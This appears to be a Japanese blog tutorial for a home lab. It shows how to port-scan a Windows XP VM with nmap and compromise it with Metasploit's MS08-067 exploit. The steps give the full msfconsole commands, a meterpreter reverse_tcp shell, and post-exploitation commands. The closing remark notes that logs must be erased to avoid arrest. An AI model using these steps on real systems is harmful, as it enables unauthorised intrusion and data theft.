VMWare上でKaliLinuxとWindowsXPを使って、ハッキング(正確にはクラッキングですが)のデモンストレーションを行っていきたいと思います。

必要なもの

仮想化ソフト 今回はVMWareを使用しますが、VirtualBoxなどでも構いません。
KaliLinuxのisoイメージ KaliLinuxの公式サイトからisoイメージをダウンロードしましょう。               torrentを使ったほうが早いかもしれません               今回は仮想マシンで実行するので、DVDやUSBに書き込む必要はあ               りません。                                   KaliLinux公式サイト http://www.kali.org/downloads/                 インストール後のログインはアカウントroot/toorです
WindowsXP SP2のディスク 各自で用意してください。
なお、それぞれVMWareへのインストールの仕方は省略させていただきます。ネットワークの設定はNATではなくブリッジにしてください。

 まずは下調べ


今回のターゲットであるWindowsXP(IPアドレスは192.168.0.7)を、nmapというツールを使ってポートスキャンという行為を行います。 *WindowsXP側のファイアウォールを無効にしておいてください。キャプチャ2.JPGアプリケーションー>Top10 Secu~ ->nmap をクリックします。すると、nmapが起動します。root@kali:~# の後に、nmap -A -O 192.168.0.7 と入力し、エンター。なお、192.168.0.7はターゲットのIPアドレスなので各自異なります。今回は、nmapのオプションで-A,-Oを使用していますが、ここでは詳しく説明しません。
しばらくすると、このような画面に 。hoge.JPGtcp 135,139,145,2859番がオープンしてますね。先ほどnmapのオプションで付けた、-O はOSの判定をしてくれます。smbの脆弱性を示しているようですね。

 それではいよいよ攻撃を開始しましょう

今回は、有名な脆弱性MS08_067netapiを使用しましょう。まずはターミナルを開き、msfconsoleと打ってエンター。しばらくすると、metasploitが起動します。 pp.JPG起動画面は毎回異なります。msf > に続けて、search ms08_067と打ってエンター。しばらくすると exploit/windows/smb/ms08_067_netapi というのが出てきますので、続いてuse exploit/windows/smb/ms08_067_netapi と打ってエンター。次に、set payload windows/meterpreter/reverse_tcp エンターset lhost 攻撃側IPアドレス エンターset rhost ターゲットIP  エンター

 いよいよ実行

それでは最後にexploitと打ってエンターしばらくすると ds.JPGこんな画面になったら成功です。meterpreterセッションが確立しました。これでターゲットのコンピュータはあなたのものになります。
meterpreter > に続き、shellやsysinfo、screenshotと入力し、ターゲットの情報を手に入れていきましょう。

終わりに

ハッキングが成功したと喜んでいてはいけません。まだシステムにはログが残っています。このログを消さないと豚箱行きです。今回はログの削除の仕方については解説しません。XPがどれほど脆弱かお分かりいただけたでしょうか?こんなものは小学生でも手順を覚えればできますね。なお、皆様分かっているとは思いますがくれぐれも自分のローカル内で実験してくださいね。